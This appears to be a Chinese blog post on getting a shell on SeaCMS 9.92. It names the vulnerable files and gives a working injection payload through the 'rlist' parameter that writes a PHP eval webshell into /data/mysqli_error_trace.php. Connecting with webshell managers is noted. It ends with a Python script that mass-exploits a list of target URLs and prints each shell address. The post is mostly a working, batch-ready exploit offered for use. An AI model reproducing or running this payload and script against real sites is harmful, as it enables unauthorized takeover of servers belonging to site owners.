浅谈seacms的getshell

最近几天一直在研究对cms的get shell,刚好看到几篇文章是关于对seacms代码审计,所以尝试写一个exp来对seacms进行getshell【seacms版本为9.92】

0x001-出现漏洞的代码

关键在于$rlist这个变量是可控的,因为下图目录在comment/api/index.php
在这里插入图片描述
在include/sql.class.php文件下有个重大漏洞,设置了一个储存报错内容的文件。
在这里插入图片描述
在这里插入图片描述

在include/filter.inc.php 文件下,将三种请求方式注册了全局变量
在这里插入图片描述

0x002-漏洞利用

构造的payload:*/eval($_POST[1]);/*
在这里插入图片描述

然后一句话木马会写进/data/mysqli_error_trace.php文件中
在这里插入图片描述

利用蚁剑或者菜刀连接成功
在这里插入图片描述

0x003-exp脚本

导入seacms的url,批量进行getshell

import requests
import re
urls = open("url.txt","r")
a = []
for url in urls:
    url1 = url.strip()
    a.append(url1)
urls.close()
aa = list(set(a))
with open("url.txt","w") as f:
    result = "\n".join(aa)
    f.write(result)
urls = open("url.txt", "r")
exp = '/comment/api/index.php?gid=1&page=2&rlist[]=*/eval($_POST[1]);/*'

for url in urls:
    try:
        target = url.strip() + exp
        html = requests.get(target).text
        if "seacms" in html:
            print(target)
            print("getshell地址:"+url+"/data/mysqli_error_trace.php")

    except Exception as e:
        pass
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值